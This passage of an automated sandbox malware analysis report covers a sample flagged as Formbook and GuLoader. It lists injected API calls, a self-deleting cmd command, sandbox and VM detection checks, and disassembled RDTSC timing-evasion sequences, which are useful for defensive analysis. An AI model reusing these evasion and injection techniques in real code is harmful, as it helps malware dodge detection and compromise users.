      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF99A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF95F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AFAD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9560 NtWriteFile,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF97A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AFA710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AFA770 NtOpenThread,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF98A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF98F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AFB040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF99D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AFA3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_007081C0 NtCreateFile,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00708270 NtReadFile,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_007082F0 NtClose,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_007083A0 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_007081BD NtCreateFile,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0070826A NtReadFile,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00708212 NtReadFile,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_007082EA NtClose,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0070839D NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0070841A NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_00401348
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_00401365
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5AD616
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E506E30
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B2EF7
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5BDFCE
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B1FF1
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5AD466
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F841F
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B1D55
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B2D07
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E0D20
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B25DD
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4FD5E0
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E512581
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B22AE
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B2B28
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A03DA
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5ADBD2
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51EBB0
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1002
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5BE824
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B28EC
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4FB090
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5120A0
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B20A8
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EF900
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E504120
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC841F
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7D466
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE2581
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACD5E0
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B825DD
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB0D20
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B82D07
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B81D55
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B82EF7
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD6E30
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7D616
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B81FF1
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8DFCE
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE20A0
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B820A8
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACB090
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B828EC
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8E824
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADA830
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71002
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD4120
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ABF900
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B822AE
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B6FA2B
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEEBB0
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7DBD2
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B703DA
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B82B28
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADAB40
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_006F8C60
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0070C5BD
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_006F2D87
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_006F2D90
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_006F2FB0
      Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04ABB150 appears 72 times
      Source: C:\Users\user\Desktop\211094.exeCode function: String function: 1E4EB150 appears 45 times
      Source: 211094.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 211094.exe, 00000000.00000002.339451864.0000000002260000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs 211094.exe
      Source: 211094.exe, 00000000.00000000.318342223.0000000000416000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSKUMLERIERNE.exe vs 211094.exe
      Source: 211094.exe, 00000000.00000002.339491184.00000000022C0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSKUMLERIERNE.exeFE2XTeltplsu vs 211094.exe
      Source: 211094.exe, 00000004.00000002.408131386.000000001EB3E000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs 211094.exe
      Source: 211094.exe, 00000004.00000002.407362131.000000001E76F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 211094.exe
      Source: 211094.exe, 00000004.00000002.404606856.000000001DDA0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs 211094.exe
      Source: 211094.exe, 00000004.00000000.337376018.0000000000416000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSKUMLERIERNE.exe vs 211094.exe
      Source: 211094.exe, 00000004.00000002.404623819.000000001DEF0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs 211094.exe
      Source: 211094.exe Binary or memory string: OriginalFilenameSKUMLERIERNE.exe vs 211094.exe
      Source: 211094.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.587887659.0000000000983000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.592534520.0000000004FC7000.00000004.00000001.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/0@15/9
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_01
      Source: C:\Users\user\Desktop\211094.exe File created: C:\Users\user\AppData\Local\Temp\~DF3FDFCBABC45FEEF5.TMP
      Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe
      Source: 211094.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\211094.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\211094.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\211094.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: 211094.exe ReversingLabs: Detection: 22%
      Source: unknown Process created: C:\Users\user\Desktop\211094.exe 'C:\Users\user\Desktop\211094.exe'
      Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
      Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\211094.exe'
      Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\211094.exe Process created: C:\Users\user\Desktop\211094.exe 'C:\Users\user\Desktop\211094.exe'
      Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\211094.exe'
      Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: Binary string: explorer.pdbUGP source: 211094.exe, 00000004.00000002.407424749.000000001E7F0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.384686029.000000000DC20000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: 211094.exe, 00000004.00000002.404809631.000000001E4C0000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.591474852.0000000004BAF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: 211094.exe, explorer.exe
      Source: Binary string: explorer.pdb source: 211094.exe, 00000004.00000002.407424749.000000001E7F0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.384686029.000000000DC20000.00000002.00000001.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match File source: 00000004.00000002.399305439.0000000000562000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: 211094.exe PID: 6984, type: MEMORY
      Source: Yara match File source: Process Memory Space: 211094.exe PID: 1872, type: MEMORY
      Yara detected VB6 Downloader Generic
      Source: Yara match File source: Process Memory Space: 211094.exe PID: 6984, type: MEMORY
      Source: Yara match File source: Process Memory Space: 211094.exe PID: 1872, type: MEMORY
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_00407F3A push es; retn 2ADCh
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_004077E6 push ss; retf
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291A56 push edi; retf
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291B27 push edi; retf
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291B6D push edi; retf
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291BB0 push edi; retf
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291B8A push edi; retf
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291CAB push edi; retf
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291D33 push edi; retf
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291D16 push edi; retf
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291D59 push edi; retf
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_022919EF push edi; retf
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E53D0D1 push ecx; ret
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_00564109 pushfd ; retf
      Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B0D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0070B3B5 push eax; ret
      Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0070B46C push eax; ret
      Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0070B402 push eax; ret
      Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0070B40B push eax; ret
      Source: C:\Users\user\Desktop\211094.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Contains functionality to detect hardware virtualization (CPUID execution measurement)
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291627 NtSetInformationThread,NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291671
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291645
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291AA5
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_022916BB
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291A9E
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291A94
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_022916F5
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291B27
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_0229179F
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_022917E9
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291BD5
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291835
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291888
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291C9C
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_022918F5
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291948
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291995
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_022919EF
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Source: C:\Users\user\Desktop\211094.exe RDTSC instruction interceptor: First address: 00000000022930E8 second address: 00000000022930E8 instructions:
      Source: C:\Users\user\Desktop\211094.exe RDTSC instruction interceptor: First address: 00000000022964EA second address: 00000000022964EA instructions:
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\211094.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\211094.exe File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: 211094.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\211094.exe RDTSC instruction interceptor: First address: 00000000022930E8 second address: 00000000022930E8 instructions:
      Source: C:\Users\user\Desktop\211094.exe RDTSC instruction interceptor: First address: 00000000022964EA second address: 00000000022964EA instructions:
      Source: C:\Users\user\Desktop\211094.exe RDTSC instruction interceptor: First address: 0000000000564EA9 second address: 0000000000564EA9 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b inc cx 0x0000000d jmp 00007FE96CD147BCh 0x0000000f test bh, bh 0x00000011 mov eax, dword ptr [ebp+64h] 0x00000014 mov bx, word ptr [edx+00010040h] 0x0000001b jmp 00007FE96CD14832h 0x0000001d test bh, ch 0x0000001f mov ax, word ptr [eax] 0x00000022 xor ax, cx 0x00000025 xor bx, ax 0x00000028 test cl, FFFFFFF6h 0x0000002b cmp bx, 5A4Dh 0x00000030 je 00007FE96CD1482Bh 0x00000032 pushad 0x00000033 lfence 0x00000036 rdtsc
      Source: C:\Users\user\Desktop\211094.exe RDTSC instruction interceptor: First address: 0000000000561A42 second address: 0000000000561D0A instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 test ah, ah 0x00000005 cmp dword ptr [edi+00000814h], 00000000h 0x0000000c je 00007FE96C4D6894h 0x00000012 test bl, dl 0x00000014 pushad 0x00000015 mov edx, 00000024h 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\211094.exe RDTSC instruction interceptor: First address: 0000000000561D0A second address: 0000000000561DEB instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 call 00007FE96CD14D7Dh 0x00000008 test dx, dx 0x0000000b cmp dword ptr [edi+00000818h], 00000000h 0x00000012 je 00007FE96CD148C4h 0x00000018 ret 0x00000019 test ah, ah 0x0000001b jmp 00007FE96CD1485Ch 0x0000001d mov eax, dword ptr fs:[00000030h] 0x00000023 mov eax, dword ptr [eax+0Ch] 0x00000026 jmp 00007FE96CD1482Eh 0x00000028 cmp bh, bh 0x0000002a mov eax, dword ptr [eax+0Ch] 0x0000002d cmp ch, ch 0x0000002f test edi, 19CD959Eh 0x00000035 test bl, al 0x00000037 test cx, 9800h 0x0000003c mov ecx, dword ptr [edi+00000808h] 0x00000042 cmp ah, bh 0x00000044 jmp 00007FE96CD14819h 0x00000046 test esi, 8F9A929Dh 0x0000004c mov dword ptr [eax+20h], ecx 0x0000004f mov esi, dword ptr [edi+00000800h] 0x00000055 mov dword ptr [eax+18h], esi 0x00000058 add esi, dword ptr [edi+00000850h] 0x0000005e mov dword ptr [eax+1Ch], esi 0x00000061 jmp 00007FE96CD1482Eh 0x00000063 test dl, dl 0x00000065 pushad 0x00000066 lfence 0x00000069 rdtsc
      Source: C:\Users\user\Desktop\211094.exe RDTSC instruction interceptor: First address: 0000000000561DEB second address: 0000000000561E31 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b cmp dword ptr [ebp+70h], 01h 0x0000000f je 00007FE96C4D673Eh 0x00000015 cmp dx, 76A4h 0x0000001a mov esi, edi 0x0000001c add esi, 00001000h 0x00000022 xor ecx, ecx 0x00000024 test bh, bh 0x00000026 cmp bl, bl 0x00000028 push ecx 0x00000029 pushad 0x0000002a mov ah, 77h 0x0000002c cmp ah, 00000077h 0x0000002f jne 00007FE96C4D6C46h 0x00000035 popad 0x00000036 push edi 0x00000037 mov eax, ebp 0x00000039 cmp dx, cx 0x0000003c add eax, 0000009Ch 0x00000041 push eax 0x00000042 pushad 0x00000043 lfence 0x00000046 rdtsc
      Source: C:\Users\user\Desktop\211094.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\211094.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 00000000006F85E4 second address: 00000000006F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 00000000006F897E second address: 00000000006F8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291627 rdtsc
      Source: C:\Windows\explorer.exe TID: 2932 Thread sleep time: -45000s >= -30000s
      Source: C:\Windows\SysWOW64\explorer.exe TID: 6780 Thread sleep time: -42000s >= -30000s
      Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: explorer.exe, 00000006.00000000.380969821.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000006.00000000.380915897.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
      Source: explorer.exe, 00000006.00000000.380788568.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000006.00000002.600452519.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000006.00000000.376726194.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000006.00000000.380915897.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000006.00000000.376726194.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
